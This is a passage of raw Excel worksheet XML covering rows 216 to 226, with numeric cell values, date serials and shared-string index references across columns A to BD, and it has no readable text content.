      </c>
      <c r="L216">
        <v>0</v>
      </c>
      <c r="M216">
        <v>1</v>
      </c>
      <c r="N216">
        <v>0</v>
      </c>
      <c r="O216">
        <v>0</v>
      </c>
      <c r="P216">
        <v>0</v>
      </c>
      <c r="Q216">
        <v>1</v>
      </c>
      <c r="R216">
        <v>14</v>
      </c>
      <c r="S216">
        <v>1</v>
      </c>
      <c r="T216">
        <v>1</v>
      </c>
      <c r="U216">
        <v>0</v>
      </c>
      <c r="V216">
        <v>1</v>
      </c>
      <c r="W216">
        <v>0</v>
      </c>
      <c r="X216">
        <v>1000</v>
      </c>
      <c r="Y216">
        <v>0</v>
      </c>
      <c r="Z216">
        <v>0</v>
      </c>
      <c r="AA216">
        <v>0</v>
      </c>
      <c r="AB216">
        <v>1500</v>
      </c>
      <c r="AC216">
        <v>40000</v>
      </c>
      <c r="AD216">
        <v>1</v>
      </c>
      <c r="AE216">
        <v>2000</v>
      </c>
      <c r="AF216" t="s">
        <v>1855</v>
      </c>
      <c r="AG216">
        <v>11820</v>
      </c>
      <c r="AH216">
        <v>12</v>
      </c>
      <c r="AJ216">
        <v>159</v>
      </c>
      <c r="AK216" t="s">
        <v>303</v>
      </c>
      <c r="AL216" t="s">
        <v>304</v>
      </c>
      <c r="AM216" t="s">
        <v>1856</v>
      </c>
      <c r="AN216" t="s">
        <v>68</v>
      </c>
      <c r="AO216">
        <v>2015</v>
      </c>
      <c r="AP216">
        <v>2155952040</v>
      </c>
      <c r="AQ216" t="s">
        <v>1857</v>
      </c>
      <c r="AR216" t="s">
        <v>1858</v>
      </c>
      <c r="AS216" t="s">
        <v>57</v>
      </c>
      <c r="AT216" t="s">
        <v>72</v>
      </c>
      <c r="AU216">
        <v>7</v>
      </c>
      <c r="AV216">
        <v>0</v>
      </c>
      <c r="AW216">
        <v>0</v>
      </c>
      <c r="AX216">
        <v>0</v>
      </c>
      <c r="AY216">
        <v>13</v>
      </c>
      <c r="AZ216">
        <v>1</v>
      </c>
      <c r="BA216" t="s">
        <v>17478</v>
      </c>
      <c r="BB216" t="s">
        <v>14375</v>
      </c>
      <c r="BC216">
        <v>0</v>
      </c>
      <c r="BD216" t="s">
        <v>11047</v>
      </c>
    </row>
    <row r="217" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A217">
        <v>837</v>
      </c>
      <c r="B217" t="s">
        <v>1859</v>
      </c>
      <c r="C217" t="s">
        <v>168</v>
      </c>
      <c r="D217" t="s">
        <v>1860</v>
      </c>
      <c r="E217" t="s">
        <v>142</v>
      </c>
      <c r="F217" t="s">
        <v>1178</v>
      </c>
      <c r="G217" s="1">
        <v>43923</v>
      </c>
      <c r="H217">
        <v>5765</v>
      </c>
      <c r="I217">
        <v>5765</v>
      </c>
      <c r="J217">
        <v>2</v>
      </c>
      <c r="K217">
        <v>0</v>
      </c>
      <c r="L217">
        <v>0</v>
      </c>
      <c r="M217">
        <v>0</v>
      </c>
      <c r="N217">
        <v>1000</v>
      </c>
      <c r="O217">
        <v>0</v>
      </c>
      <c r="P217">
        <v>0</v>
      </c>
      <c r="Q217">
        <v>2</v>
      </c>
      <c r="R217">
        <v>1</v>
      </c>
      <c r="S217">
        <v>0</v>
      </c>
      <c r="T217">
        <v>0</v>
      </c>
      <c r="U217">
        <v>20000</v>
      </c>
      <c r="V217">
        <v>0</v>
      </c>
      <c r="W217">
        <v>0</v>
      </c>
      <c r="X217">
        <v>0</v>
      </c>
      <c r="Y217">
        <v>0</v>
      </c>
      <c r="Z217">
        <v>0</v>
      </c>
      <c r="AA217">
        <v>0</v>
      </c>
      <c r="AB217">
        <v>700</v>
      </c>
      <c r="AC217">
        <v>700</v>
      </c>
      <c r="AD217">
        <v>0</v>
      </c>
      <c r="AE217">
        <v>0</v>
      </c>
      <c r="AF217" t="s">
        <v>1861</v>
      </c>
      <c r="AG217">
        <v>43364</v>
      </c>
      <c r="AH217">
        <v>13</v>
      </c>
      <c r="AJ217">
        <v>162</v>
      </c>
      <c r="AK217" t="s">
        <v>1109</v>
      </c>
      <c r="AL217" t="s">
        <v>1109</v>
      </c>
      <c r="AM217" t="s">
        <v>1862</v>
      </c>
      <c r="AN217" t="s">
        <v>55</v>
      </c>
      <c r="AO217">
        <v>2010</v>
      </c>
      <c r="AP217" t="s">
        <v>1863</v>
      </c>
      <c r="AQ217" t="s">
        <v>1864</v>
      </c>
      <c r="AR217" t="s">
        <v>1865</v>
      </c>
      <c r="AU217">
        <v>1</v>
      </c>
      <c r="AV217">
        <v>1</v>
      </c>
      <c r="AW217">
        <v>5</v>
      </c>
      <c r="AX217">
        <v>2</v>
      </c>
      <c r="AY217">
        <v>12</v>
      </c>
      <c r="AZ217">
        <v>4</v>
      </c>
      <c r="BA217" t="s">
        <v>16763</v>
      </c>
      <c r="BB217" t="s">
        <v>14884</v>
      </c>
      <c r="BC217">
        <v>0</v>
      </c>
      <c r="BD217" t="s">
        <v>9481</v>
      </c>
    </row>
    <row r="218" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A218">
        <v>480</v>
      </c>
      <c r="B218" t="s">
        <v>1866</v>
      </c>
      <c r="C218" t="s">
        <v>157</v>
      </c>
      <c r="D218" t="s">
        <v>1867</v>
      </c>
      <c r="E218" t="s">
        <v>412</v>
      </c>
      <c r="F218" t="s">
        <v>1868</v>
      </c>
      <c r="G218" s="1">
        <v>44154</v>
      </c>
      <c r="H218">
        <v>5842</v>
      </c>
      <c r="I218">
        <v>5842</v>
      </c>
      <c r="J218">
        <v>3</v>
      </c>
      <c r="K218">
        <v>0</v>
      </c>
      <c r="L218">
        <v>5</v>
      </c>
      <c r="M218">
        <v>3</v>
      </c>
      <c r="N218">
        <v>0</v>
      </c>
      <c r="O218">
        <v>0</v>
      </c>
      <c r="P218">
        <v>0</v>
      </c>
      <c r="Q218">
        <v>5</v>
      </c>
      <c r="R218">
        <v>20</v>
      </c>
      <c r="S218">
        <v>0</v>
      </c>
      <c r="T218">
        <v>1</v>
      </c>
      <c r="U218">
        <v>3000000</v>
      </c>
      <c r="V218">
        <v>0</v>
      </c>
      <c r="W218">
        <v>22000</v>
      </c>
      <c r="X218">
        <v>4500</v>
      </c>
      <c r="Y218">
        <v>0</v>
      </c>
      <c r="Z218">
        <v>0</v>
      </c>
      <c r="AA218">
        <v>0</v>
      </c>
      <c r="AB218">
        <v>5000</v>
      </c>
      <c r="AC218">
        <v>10000</v>
      </c>
      <c r="AD218">
        <v>0</v>
      </c>
      <c r="AE218">
        <v>100000</v>
      </c>
      <c r="AF218" t="s">
        <v>1869</v>
      </c>
      <c r="AG218">
        <v>62353</v>
      </c>
      <c r="AH218">
        <v>16</v>
      </c>
      <c r="AJ218">
        <v>250</v>
      </c>
      <c r="AK218" t="s">
        <v>1870</v>
      </c>
      <c r="AL218" t="s">
        <v>1871</v>
      </c>
      <c r="AM218" t="s">
        <v>1872</v>
      </c>
      <c r="AN218" t="s">
        <v>55</v>
      </c>
      <c r="AO218">
        <v>2012</v>
      </c>
      <c r="AP218">
        <v>3564161809</v>
      </c>
      <c r="AQ218" t="s">
        <v>1873</v>
      </c>
      <c r="AR218" t="s">
        <v>1869</v>
      </c>
      <c r="AU218">
        <v>24</v>
      </c>
      <c r="AV218">
        <v>1</v>
      </c>
      <c r="AW218">
        <v>20</v>
      </c>
      <c r="AX218">
        <v>24</v>
      </c>
      <c r="AY218">
        <v>5</v>
      </c>
      <c r="AZ218">
        <v>7</v>
      </c>
      <c r="BA218">
        <v>0</v>
      </c>
      <c r="BB218" t="s">
        <v>14608</v>
      </c>
      <c r="BC218">
        <v>0</v>
      </c>
      <c r="BD218" t="s">
        <v>11000</v>
      </c>
    </row>
    <row r="219" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A219">
        <v>773</v>
      </c>
      <c r="B219" t="s">
        <v>1874</v>
      </c>
      <c r="C219" t="s">
        <v>88</v>
      </c>
      <c r="D219" t="s">
        <v>1875</v>
      </c>
      <c r="E219" t="s">
        <v>1876</v>
      </c>
      <c r="F219" t="s">
        <v>1877</v>
      </c>
      <c r="G219" s="1">
        <v>44287</v>
      </c>
      <c r="H219">
        <v>5884</v>
      </c>
      <c r="I219">
        <v>5884</v>
      </c>
      <c r="J219">
        <v>4</v>
      </c>
      <c r="K219">
        <v>0</v>
      </c>
      <c r="L219">
        <v>5</v>
      </c>
      <c r="M219">
        <v>0</v>
      </c>
      <c r="N219">
        <v>0</v>
      </c>
      <c r="O219">
        <v>1</v>
      </c>
      <c r="P219">
        <v>0</v>
      </c>
      <c r="Q219">
        <v>3</v>
      </c>
      <c r="R219">
        <v>5</v>
      </c>
      <c r="S219">
        <v>1</v>
      </c>
      <c r="T219">
        <v>1</v>
      </c>
      <c r="U219">
        <v>327000</v>
      </c>
      <c r="V219">
        <v>0</v>
      </c>
      <c r="W219">
        <v>17000</v>
      </c>
      <c r="X219">
        <v>0</v>
      </c>
      <c r="Y219">
        <v>0</v>
      </c>
      <c r="Z219">
        <v>5000</v>
      </c>
      <c r="AA219">
        <v>0</v>
      </c>
      <c r="AB219">
        <v>500</v>
      </c>
      <c r="AC219">
        <v>5000</v>
      </c>
      <c r="AD219">
        <v>1</v>
      </c>
      <c r="AE219">
        <v>5000</v>
      </c>
      <c r="AF219" t="s">
        <v>1878</v>
      </c>
      <c r="AG219">
        <v>0</v>
      </c>
      <c r="AH219">
        <v>17</v>
      </c>
      <c r="AJ219">
        <v>282</v>
      </c>
      <c r="AK219" t="s">
        <v>592</v>
      </c>
      <c r="AL219" t="s">
        <v>593</v>
      </c>
      <c r="AM219" t="s">
        <v>1879</v>
      </c>
      <c r="AN219" t="s">
        <v>55</v>
      </c>
      <c r="AO219">
        <v>2005</v>
      </c>
      <c r="AP219" t="s">
        <v>1880</v>
      </c>
      <c r="AQ219" t="s">
        <v>1881</v>
      </c>
      <c r="AR219" t="s">
        <v>1882</v>
      </c>
      <c r="AS219" t="s">
        <v>71</v>
      </c>
      <c r="AT219" t="s">
        <v>58</v>
      </c>
      <c r="AU219">
        <v>23</v>
      </c>
      <c r="AV219">
        <v>1</v>
      </c>
      <c r="AW219">
        <v>0</v>
      </c>
      <c r="AX219">
        <v>0</v>
      </c>
      <c r="AY219">
        <v>12</v>
      </c>
      <c r="AZ219">
        <v>4</v>
      </c>
      <c r="BA219" t="s">
        <v>16755</v>
      </c>
      <c r="BB219" t="s">
        <v>14844</v>
      </c>
      <c r="BC219" t="s">
        <v>11865</v>
      </c>
      <c r="BD219" t="s">
        <v>11866</v>
      </c>
    </row>
    <row r="220" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A220">
        <v>558</v>
      </c>
      <c r="B220" t="s">
        <v>1883</v>
      </c>
      <c r="C220" t="s">
        <v>157</v>
      </c>
      <c r="D220" t="s">
        <v>1884</v>
      </c>
      <c r="E220" t="s">
        <v>142</v>
      </c>
      <c r="F220" t="s">
        <v>562</v>
      </c>
      <c r="G220" s="1">
        <v>44158</v>
      </c>
      <c r="H220">
        <v>5945</v>
      </c>
      <c r="I220">
        <v>5945</v>
      </c>
      <c r="J220">
        <v>3</v>
      </c>
      <c r="K220">
        <v>0</v>
      </c>
      <c r="L220">
        <v>1</v>
      </c>
      <c r="M220">
        <v>2</v>
      </c>
      <c r="N220">
        <v>3000</v>
      </c>
      <c r="O220">
        <v>0</v>
      </c>
      <c r="P220">
        <v>0</v>
      </c>
      <c r="Q220">
        <v>3</v>
      </c>
      <c r="R220">
        <v>32</v>
      </c>
      <c r="S220">
        <v>0</v>
      </c>
      <c r="T220">
        <v>0</v>
      </c>
      <c r="U220">
        <v>1100000</v>
      </c>
      <c r="V220">
        <v>0</v>
      </c>
      <c r="W220">
        <v>5000</v>
      </c>
      <c r="X220">
        <v>10000</v>
      </c>
      <c r="Y220">
        <v>0</v>
      </c>
      <c r="Z220">
        <v>0</v>
      </c>
      <c r="AA220">
        <v>0</v>
      </c>
      <c r="AB220">
        <v>1150</v>
      </c>
      <c r="AC220">
        <v>13350</v>
      </c>
      <c r="AD220">
        <v>0</v>
      </c>
      <c r="AE220">
        <v>0</v>
      </c>
      <c r="AF220" t="s">
        <v>1885</v>
      </c>
      <c r="AG220">
        <v>61121</v>
      </c>
      <c r="AH220">
        <v>16</v>
      </c>
      <c r="AJ220">
        <v>252</v>
      </c>
      <c r="AK220" t="s">
        <v>387</v>
      </c>
      <c r="AL220" t="s">
        <v>388</v>
      </c>
      <c r="AM220" t="s">
        <v>1886</v>
      </c>
      <c r="AN220" t="s">
        <v>55</v>
      </c>
      <c r="AO220">
        <v>2001</v>
      </c>
      <c r="AP220" t="s">
        <v>1887</v>
      </c>
      <c r="AQ220" t="s">
        <v>1888</v>
      </c>
      <c r="AR220" t="s">
        <v>1889</v>
      </c>
      <c r="AU220">
        <v>25</v>
      </c>
      <c r="AV220">
        <v>1</v>
      </c>
      <c r="AW220">
        <v>41</v>
      </c>
      <c r="AX220">
        <v>134</v>
      </c>
      <c r="AY220">
        <v>11</v>
      </c>
      <c r="AZ220">
        <v>9</v>
      </c>
      <c r="BA220" t="s">
        <v>16718</v>
      </c>
      <c r="BB220" t="s">
        <v>14672</v>
      </c>
      <c r="BC220">
        <v>0</v>
      </c>
      <c r="BD220" t="s">
        <v>11884</v>
      </c>
    </row>
    <row r="221" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A221">
        <v>236</v>
      </c>
      <c r="B221" t="s">
        <v>1890</v>
      </c>
      <c r="C221" t="s">
        <v>157</v>
      </c>
      <c r="D221" t="s">
        <v>1891</v>
      </c>
      <c r="E221" t="s">
        <v>76</v>
      </c>
      <c r="F221" t="s">
        <v>1892</v>
      </c>
      <c r="G221" s="1">
        <v>44175</v>
      </c>
      <c r="H221">
        <v>6026</v>
      </c>
      <c r="I221">
        <v>6026</v>
      </c>
      <c r="J221">
        <v>1</v>
      </c>
      <c r="K221">
        <v>0</v>
      </c>
      <c r="L221">
        <v>1</v>
      </c>
      <c r="M221">
        <v>0</v>
      </c>
      <c r="N221">
        <v>0</v>
      </c>
      <c r="O221">
        <v>0</v>
      </c>
      <c r="P221">
        <v>0</v>
      </c>
      <c r="Q221">
        <v>0</v>
      </c>
      <c r="R221">
        <v>0</v>
      </c>
      <c r="S221">
        <v>1</v>
      </c>
      <c r="T221">
        <v>1</v>
      </c>
      <c r="U221">
        <v>85000</v>
      </c>
      <c r="V221">
        <v>0</v>
      </c>
      <c r="W221">
        <v>50000</v>
      </c>
      <c r="X221">
        <v>0</v>
      </c>
      <c r="Y221">
        <v>0</v>
      </c>
      <c r="Z221">
        <v>0</v>
      </c>
      <c r="AA221">
        <v>0</v>
      </c>
      <c r="AB221">
        <v>0</v>
      </c>
      <c r="AC221">
        <v>0</v>
      </c>
      <c r="AD221">
        <v>1</v>
      </c>
      <c r="AE221">
        <v>200000</v>
      </c>
      <c r="AF221" t="s">
        <v>1893</v>
      </c>
      <c r="AG221">
        <v>61219</v>
      </c>
      <c r="AH221">
        <v>16</v>
      </c>
      <c r="AJ221">
        <v>242</v>
      </c>
      <c r="AK221" t="s">
        <v>1894</v>
      </c>
      <c r="AL221" t="s">
        <v>1895</v>
      </c>
      <c r="AM221" t="s">
        <v>1896</v>
      </c>
      <c r="AN221" t="s">
        <v>82</v>
      </c>
      <c r="AO221">
        <v>1978</v>
      </c>
      <c r="AP221">
        <v>318951910</v>
      </c>
      <c r="AQ221" t="s">
        <v>1897</v>
      </c>
      <c r="AR221" t="s">
        <v>1898</v>
      </c>
      <c r="AS221" t="s">
        <v>71</v>
      </c>
      <c r="AT221" t="s">
        <v>86</v>
      </c>
      <c r="AU221">
        <v>26</v>
      </c>
      <c r="AV221">
        <v>1</v>
      </c>
      <c r="AW221">
        <v>25</v>
      </c>
      <c r="AX221">
        <v>45</v>
      </c>
      <c r="AY221">
        <v>18</v>
      </c>
      <c r="AZ221">
        <v>25</v>
      </c>
      <c r="BA221" t="s">
        <v>16646</v>
      </c>
      <c r="BB221" t="s">
        <v>14410</v>
      </c>
      <c r="BC221">
        <v>0</v>
      </c>
      <c r="BD221" t="s">
        <v>11912</v>
      </c>
    </row>
    <row r="222" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A222">
        <v>29</v>
      </c>
      <c r="B222" t="s">
        <v>1899</v>
      </c>
      <c r="C222" t="s">
        <v>88</v>
      </c>
      <c r="D222" t="s">
        <v>1900</v>
      </c>
      <c r="E222" t="s">
        <v>49</v>
      </c>
      <c r="F222" t="s">
        <v>1901</v>
      </c>
      <c r="G222" s="1">
        <v>44293</v>
      </c>
      <c r="H222">
        <v>6084</v>
      </c>
      <c r="I222">
        <v>6084</v>
      </c>
      <c r="J222">
        <v>0</v>
      </c>
      <c r="K222">
        <v>0</v>
      </c>
      <c r="L222">
        <v>0</v>
      </c>
      <c r="M222">
        <v>0</v>
      </c>
      <c r="N222">
        <v>0</v>
      </c>
      <c r="O222">
        <v>0</v>
      </c>
      <c r="P222">
        <v>0</v>
      </c>
      <c r="Q222">
        <v>0</v>
      </c>
      <c r="R222">
        <v>15</v>
      </c>
      <c r="S222">
        <v>1</v>
      </c>
      <c r="T222">
        <v>0</v>
      </c>
      <c r="U222">
        <v>0</v>
      </c>
      <c r="V222">
        <v>0</v>
      </c>
      <c r="W222">
        <v>0</v>
      </c>
      <c r="X222">
        <v>0</v>
      </c>
      <c r="Y222">
        <v>0</v>
      </c>
      <c r="Z222">
        <v>0</v>
      </c>
      <c r="AA222">
        <v>0</v>
      </c>
      <c r="AB222">
        <v>0</v>
      </c>
      <c r="AC222">
        <v>280</v>
      </c>
      <c r="AD222">
        <v>1</v>
      </c>
      <c r="AE222">
        <v>0</v>
      </c>
      <c r="AF222" t="s">
        <v>1902</v>
      </c>
      <c r="AG222">
        <v>80223</v>
      </c>
      <c r="AH222">
        <v>17</v>
      </c>
      <c r="AJ222">
        <v>282</v>
      </c>
      <c r="AK222" t="s">
        <v>592</v>
      </c>
      <c r="AL222" t="s">
        <v>1903</v>
      </c>
      <c r="AM222" t="s">
        <v>1904</v>
      </c>
      <c r="AN222" t="s">
        <v>55</v>
      </c>
      <c r="AO222">
        <v>2011</v>
      </c>
      <c r="AP222">
        <v>3618497893</v>
      </c>
      <c r="AQ222" t="s">
        <v>1905</v>
      </c>
      <c r="AR222" t="s">
        <v>1902</v>
      </c>
      <c r="AS222" t="s">
        <v>71</v>
      </c>
      <c r="AT222" t="s">
        <v>58</v>
      </c>
      <c r="AU222">
        <v>26</v>
      </c>
      <c r="AV222">
        <v>0</v>
      </c>
      <c r="AW222">
        <v>0</v>
      </c>
      <c r="AX222">
        <v>0</v>
      </c>
      <c r="AY222">
        <v>4</v>
      </c>
      <c r="AZ222">
        <v>3</v>
      </c>
      <c r="BA222" t="s">
        <v>17518</v>
      </c>
      <c r="BB222" t="s">
        <v>14233</v>
      </c>
      <c r="BC222">
        <v>0</v>
      </c>
      <c r="BD222" t="s">
        <v>9553</v>
      </c>
    </row>
    <row r="223" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A223">
        <v>16</v>
      </c>
      <c r="B223" t="s">
        <v>1906</v>
      </c>
      <c r="C223" t="s">
        <v>1672</v>
      </c>
      <c r="D223" t="s">
        <v>1907</v>
      </c>
      <c r="E223" t="s">
        <v>142</v>
      </c>
      <c r="F223" t="s">
        <v>1746</v>
      </c>
      <c r="G223" s="1">
        <v>44104</v>
      </c>
      <c r="H223">
        <v>6091</v>
      </c>
      <c r="I223">
        <v>6091</v>
      </c>
      <c r="J223">
        <v>9</v>
      </c>
      <c r="K223">
        <v>0</v>
      </c>
      <c r="L223">
        <v>0</v>
      </c>
      <c r="M223">
        <v>3</v>
      </c>
      <c r="N223">
        <v>0</v>
      </c>
      <c r="O223">
        <v>0</v>
      </c>
      <c r="P223">
        <v>0</v>
      </c>
      <c r="Q223">
        <v>0</v>
      </c>
      <c r="R223">
        <v>17</v>
      </c>
      <c r="S223">
        <v>0</v>
      </c>
      <c r="T223">
        <v>0</v>
      </c>
      <c r="U223">
        <v>250000</v>
      </c>
      <c r="V223">
        <v>0</v>
      </c>
      <c r="W223">
        <v>0</v>
      </c>
      <c r="X223">
        <v>3500</v>
      </c>
      <c r="Y223">
        <v>0</v>
      </c>
      <c r="Z223">
        <v>0</v>
      </c>
      <c r="AA223">
        <v>0</v>
      </c>
      <c r="AB223">
        <v>0</v>
      </c>
      <c r="AC223">
        <v>8500</v>
      </c>
      <c r="AD223">
        <v>0</v>
      </c>
      <c r="AE223">
        <v>0</v>
      </c>
      <c r="AF223" t="s">
        <v>1908</v>
      </c>
      <c r="AG223">
        <v>70113</v>
      </c>
      <c r="AH223">
        <v>22</v>
      </c>
      <c r="AJ223">
        <v>354</v>
      </c>
      <c r="AK223" t="s">
        <v>1909</v>
      </c>
      <c r="AL223" t="s">
        <v>1910</v>
      </c>
      <c r="AM223" t="s">
        <v>1911</v>
      </c>
      <c r="AN223" t="s">
        <v>55</v>
      </c>
      <c r="AO223">
        <v>2007</v>
      </c>
      <c r="AP223">
        <v>5113352277</v>
      </c>
      <c r="AQ223">
        <v>82153546000</v>
      </c>
      <c r="AR223" t="s">
        <v>1912</v>
      </c>
      <c r="AS223" t="s">
        <v>71</v>
      </c>
      <c r="AT223" t="s">
        <v>58</v>
      </c>
      <c r="AU223">
        <v>26</v>
      </c>
      <c r="AV223">
        <v>1</v>
      </c>
      <c r="AW223">
        <v>20</v>
      </c>
      <c r="AX223">
        <v>62</v>
      </c>
      <c r="AY223">
        <v>21</v>
      </c>
      <c r="AZ223">
        <v>29</v>
      </c>
      <c r="BA223" t="s">
        <v>17453</v>
      </c>
      <c r="BB223" t="s">
        <v>14220</v>
      </c>
      <c r="BC223">
        <v>0</v>
      </c>
      <c r="BD223" t="s">
        <v>11959</v>
      </c>
    </row>
    <row r="224" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A224">
        <v>321</v>
      </c>
      <c r="B224" t="s">
        <v>1913</v>
      </c>
      <c r="C224" t="s">
        <v>168</v>
      </c>
      <c r="D224" t="s">
        <v>1914</v>
      </c>
      <c r="E224" t="s">
        <v>142</v>
      </c>
      <c r="F224" t="s">
        <v>1915</v>
      </c>
      <c r="G224" s="1">
        <v>44119</v>
      </c>
      <c r="H224">
        <v>6132</v>
      </c>
      <c r="I224">
        <v>6132</v>
      </c>
      <c r="J224">
        <v>3</v>
      </c>
      <c r="K224">
        <v>0</v>
      </c>
      <c r="L224">
        <v>0</v>
      </c>
      <c r="M224">
        <v>0</v>
      </c>
      <c r="N224">
        <v>1000</v>
      </c>
      <c r="O224">
        <v>0</v>
      </c>
      <c r="P224">
        <v>0</v>
      </c>
      <c r="Q224">
        <v>0</v>
      </c>
      <c r="R224">
        <v>0</v>
      </c>
      <c r="S224">
        <v>0</v>
      </c>
      <c r="T224">
        <v>1</v>
      </c>
      <c r="U224">
        <v>200000</v>
      </c>
      <c r="V224">
        <v>0</v>
      </c>
      <c r="W224">
        <v>0</v>
      </c>
      <c r="X224">
        <v>0</v>
      </c>
      <c r="Y224">
        <v>0</v>
      </c>
      <c r="Z224">
        <v>0</v>
      </c>
      <c r="AA224">
        <v>0</v>
      </c>
      <c r="AB224">
        <v>0</v>
      </c>
      <c r="AC224">
        <v>0</v>
      </c>
      <c r="AD224">
        <v>0</v>
      </c>
      <c r="AE224">
        <v>100000</v>
      </c>
      <c r="AF224" t="s">
        <v>1916</v>
      </c>
      <c r="AG224">
        <v>16810</v>
      </c>
      <c r="AH224">
        <v>13</v>
      </c>
      <c r="AJ224">
        <v>161</v>
      </c>
      <c r="AK224" t="s">
        <v>1917</v>
      </c>
      <c r="AL224" t="s">
        <v>1918</v>
      </c>
      <c r="AM224" t="s">
        <v>1919</v>
      </c>
      <c r="AN224" t="s">
        <v>55</v>
      </c>
      <c r="AO224">
        <v>2016</v>
      </c>
      <c r="AP224" t="s">
        <v>1920</v>
      </c>
      <c r="AQ224" t="s">
        <v>1921</v>
      </c>
      <c r="AR224" t="s">
        <v>1922</v>
      </c>
      <c r="AS224" t="s">
        <v>71</v>
      </c>
      <c r="AT224" t="s">
        <v>58</v>
      </c>
      <c r="AU224">
        <v>25</v>
      </c>
      <c r="AV224">
        <v>1</v>
      </c>
      <c r="AW224">
        <v>34</v>
      </c>
      <c r="AX224">
        <v>20</v>
      </c>
      <c r="AY224">
        <v>13</v>
      </c>
      <c r="AZ224">
        <v>1</v>
      </c>
      <c r="BA224" t="s">
        <v>17523</v>
      </c>
      <c r="BB224" t="s">
        <v>14480</v>
      </c>
      <c r="BC224" t="s">
        <v>11970</v>
      </c>
      <c r="BD224" t="s">
        <v>11971</v>
      </c>
    </row>
    <row r="225" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A225">
        <v>403</v>
      </c>
      <c r="B225" t="s">
        <v>1923</v>
      </c>
      <c r="C225" t="s">
        <v>47</v>
      </c>
      <c r="D225" t="s">
        <v>1924</v>
      </c>
      <c r="E225" t="s">
        <v>1925</v>
      </c>
      <c r="F225" t="s">
        <v>1926</v>
      </c>
      <c r="G225" s="1">
        <v>44203</v>
      </c>
      <c r="H225">
        <v>6211</v>
      </c>
      <c r="I225">
        <v>6211</v>
      </c>
      <c r="J225">
        <v>1</v>
      </c>
      <c r="K225">
        <v>0</v>
      </c>
      <c r="L225">
        <v>0</v>
      </c>
      <c r="M225">
        <v>0</v>
      </c>
      <c r="N225">
        <v>0</v>
      </c>
      <c r="O225">
        <v>0</v>
      </c>
      <c r="P225">
        <v>0</v>
      </c>
      <c r="Q225">
        <v>1</v>
      </c>
      <c r="R225">
        <v>3</v>
      </c>
      <c r="S225">
        <v>0</v>
      </c>
      <c r="T225">
        <v>0</v>
      </c>
      <c r="U225">
        <v>200000</v>
      </c>
      <c r="V225">
        <v>0</v>
      </c>
      <c r="W225">
        <v>0</v>
      </c>
      <c r="X225">
        <v>0</v>
      </c>
      <c r="Y225">
        <v>0</v>
      </c>
      <c r="Z225">
        <v>0</v>
      </c>
      <c r="AA225">
        <v>0</v>
      </c>
      <c r="AB225">
        <v>0</v>
      </c>
      <c r="AC225">
        <v>0</v>
      </c>
      <c r="AD225">
        <v>0</v>
      </c>
      <c r="AE225">
        <v>0</v>
      </c>
      <c r="AF225" t="s">
        <v>1927</v>
      </c>
      <c r="AG225">
        <v>20121</v>
      </c>
      <c r="AH225">
        <v>2</v>
      </c>
      <c r="AJ225">
        <v>53</v>
      </c>
      <c r="AK225" t="s">
        <v>1928</v>
      </c>
      <c r="AL225" t="s">
        <v>1929</v>
      </c>
      <c r="AM225" t="s">
        <v>1930</v>
      </c>
      <c r="AN225" t="s">
        <v>55</v>
      </c>
      <c r="AO225">
        <v>2017</v>
      </c>
      <c r="AP225" t="s">
        <v>1931</v>
      </c>
      <c r="AQ225" t="s">
        <v>1932</v>
      </c>
      <c r="AR225" t="s">
        <v>1933</v>
      </c>
      <c r="AS225" t="s">
        <v>71</v>
      </c>
      <c r="AT225" t="s">
        <v>58</v>
      </c>
      <c r="AU225">
        <v>26</v>
      </c>
      <c r="AV225">
        <v>0</v>
      </c>
      <c r="AW225">
        <v>0</v>
      </c>
      <c r="AX225">
        <v>0</v>
      </c>
      <c r="AY225">
        <v>2</v>
      </c>
      <c r="AZ225">
        <v>2</v>
      </c>
      <c r="BA225" t="s">
        <v>16684</v>
      </c>
      <c r="BB225" t="s">
        <v>14547</v>
      </c>
      <c r="BC225" t="s">
        <v>9603</v>
      </c>
      <c r="BD225" t="s">
        <v>12117</v>
      </c>
    </row>
    <row r="226" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A226">
        <v>366</v>
      </c>
      <c r="B226" t="s">
        <v>1934</v>
      </c>
      <c r="C226" t="s">
        <v>74</v>
      </c>
      <c r="D226" t="s">
        <v>1935</v>
      </c>
      <c r="E226" t="s">
        <v>142</v>
      </c>
      <c r="F226" t="s">
        <v>1936</v>
      </c>
      <c r="G226" s="1">
        <v>44202</v>
      </c>
      <c r="H226">
        <v>6222</v>
      </c>
      <c r="I226">
        <v>6222</v>
      </c>
      <c r="J226">
        <v>4</v>
      </c>
      <c r="K226">
        <v>0</v>
      </c>
      <c r="L226">
        <v>0</v>
      </c>
      <c r="M226">
        <v>7</v>
      </c>
      <c r="N226">
        <v>2800</v>
      </c>
      <c r="O226">
        <v>0</v>
      </c>
      <c r="P226">
        <v>0</v>
      </c>
      <c r="Q226">
        <v>2</v>
      </c>
      <c r="R226">
        <v>0</v>
      </c>
      <c r="S226">
        <v>1</v>
      </c>
      <c r="T226">
        <v>1</v>
      </c>
      <c r="U226">
        <v>25000000</v>
      </c>
      <c r="V226">
        <v>0</v>
      </c>
      <c r="W226">
        <v>0</v>
      </c>
      <c r="X226">
        <v>2100</v>
      </c>
      <c r="Y226">
        <v>0</v>
      </c>
      <c r="Z226">
        <v>0</v>
      </c>
      <c r="AA226">
        <v>0</v>
      </c>
      <c r="AB226">
        <v>400</v>
      </c>
      <c r="AC226">
        <v>0</v>
      </c>
      <c r="AD226">
        <v>1</v>
      </c>
      <c r="AE226">
        <v>7000</v>
      </c>
      <c r="AF226" t="s">
        <v>1937</v>
      </c>
      <c r="AG226">
        <v>59111</v>
      </c>
      <c r="AH226">
        <v>14</v>
      </c>
      <c r="AJ226">
        <v>205</v>
      </c>
      <c r="AK226" t="s">
        <v>1938</v>
      </c>
      <c r="AL226" t="s">
        <v>1939</v>
      </c>
      <c r="AM226" t="s">
        <v>1940</v>
      </c>
      <c r="AN226" t="s">
        <v>82</v>
      </c>
      <c r="AO226">
        <v>2012</v>
      </c>
      <c r="AP226" t="s">
        <v>1941</v>
      </c>
      <c r="AQ226" t="s">
        <v>1942</v>
      </c>
      <c r="AR226" t="s">
        <v>1943</v>
      </c>
      <c r="AS226" t="s">
        <v>71</v>
      </c>
      <c r="AT226" t="s">
